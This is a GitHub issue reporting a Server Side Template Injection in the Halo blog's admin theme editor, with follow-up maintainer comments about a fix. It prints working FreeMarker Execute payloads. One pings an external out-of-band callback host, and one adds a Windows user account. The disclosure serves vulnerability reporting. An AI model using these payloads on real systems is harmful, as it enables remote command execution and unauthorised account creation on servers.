Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

unsafe template file permissions edit cause Server Side Template Injection(SSTI) #440

Closed
5 tasks
c0d1007 opened this issue Dec 24, 2019 · 6 comments
Closed
5 tasks
Labels
kind/support Categorizes issue or PR as a support question. vulnerability Vulnerability

Comments

@c0d1007
Copy link

c0d1007 commented Dec 24, 2019

我确定我已经查看了 (标注[ ][x])


我要申请 (标注[ ][x])

  • [x ] BUG 反馈
  • 添加新的特性或者功能
  • 请求技术支持

Testing environment

java version:1.8.0_181
os system: windows
server ip address:192.168.126.136

Vulnerability Test

Simple test

access address http://192.168.126.136:8090/admin/ and login in the backstage.Click exterior(外观) and select theme editor(主题编辑). Select any one of the template files,such as "page-top.ftl". Then edit the file and insert a template statement like this.

payload-1

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("ping ggggga.2xxxxxj.ceye.io") }

image

Save the file and refresh home page,and then ceye platform can receive a message

image

Execute system command

also edit "page-top.ftl" to execute system command to add system user.

payload-2

<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("net user security security /add") }

image

save the file again and refresh home page again.Then will add user in the system

image

Remark

Because the preview does not display the picture properly when editing the issus, you can visit my github project(https://github.com/c0d1007/exploit) and view the picture.

Solution

Template files can only be edited locally, or check the file input

@JohnNiang
Copy link
Member

This issue seems to be fixed here #419 .

@c0d1007
Copy link
Author

c0d1007 commented Dec 25, 2019

Has the vulnerability been fixed?

@c0d1007
Copy link
Author

c0d1007 commented Dec 25, 2019

Can i find you in halo qq group, i want to know how to fix it?Because i used your blog.

@JohnNiang
Copy link
Member

JohnNiang commented Dec 25, 2019

Can i find you in halo qq group, i want to know how to fix it?Because i used your blog.

dc3a73e

But halo has not been released the newest version.

@JohnNiang JohnNiang added kind/support Categorizes issue or PR as a support question. vulnerability Vulnerability labels Dec 25, 2019
@c0d1007
Copy link
Author

c0d1007 commented Dec 25, 2019

ok,thank you.

@JohnNiang
Copy link
Member

ok,thank you.

But you have to test it before using.

JohnNiang pushed a commit to JohnNiang/halo that referenced this issue Mar 2, 2023
* refactor: sheet editing

Signed-off-by: Ryan Wang <i@ryanc.cc>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
kind/support Categorizes issue or PR as a support question. vulnerability Vulnerability
Projects
None yet
Development

No branches or pull requests

2 participants